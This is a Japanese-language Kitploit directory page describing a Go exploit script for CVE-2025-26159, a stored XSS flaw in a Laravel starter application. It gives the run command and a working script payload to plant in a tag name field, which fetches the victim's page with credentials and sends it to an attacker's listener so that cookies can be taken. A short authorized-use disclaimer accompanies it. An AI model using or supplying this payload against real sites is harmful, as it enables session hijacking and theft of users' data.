Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-26159 — CVE-2025-26159のGoベースのエクスプロイトスクリプト。保存型XSSペイロード注入を介してLaravelアプリケーションからクッキーをデコード、フィルタリング、抽出します。 | Kitploit
ツール/GitHubGitHub/godbadtry/cve-2025-26159
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubgodbadtry/cve-2025-26159

CVE-2025-26159

CVE-2025-26159のGoベースのエクスプロイトスクリプト。保存型XSSペイロード注入を介してLaravelアプリケーションからクッキーをデコード、フィルタリング、抽出します。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-26159

このスクリプトは、明示的な許可が与えられた認可された環境でのみ使用されるべきです。作者は、このスクリプトの使用に起因する誤用、損害、または結果について一切の責任を負いません。

このスクリプトは、CVE-2025-26159の悪用の一環として、Cookieをデコード、フィルタリング、抽出します。

使用法

悪用の手順を理解するには、私のブログのこの記事を確認してください。

root@kitploit:~
go run CVE-2025-26159.go

Laravelスターターのタグ名フィールドに、次のペイロードを追加します。

root@kitploit:~
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>

ユーザーが悪意のあるタグの詳細ページにアクセスすると、そのユーザーのCookieを取得できます。

ツールをダウンロード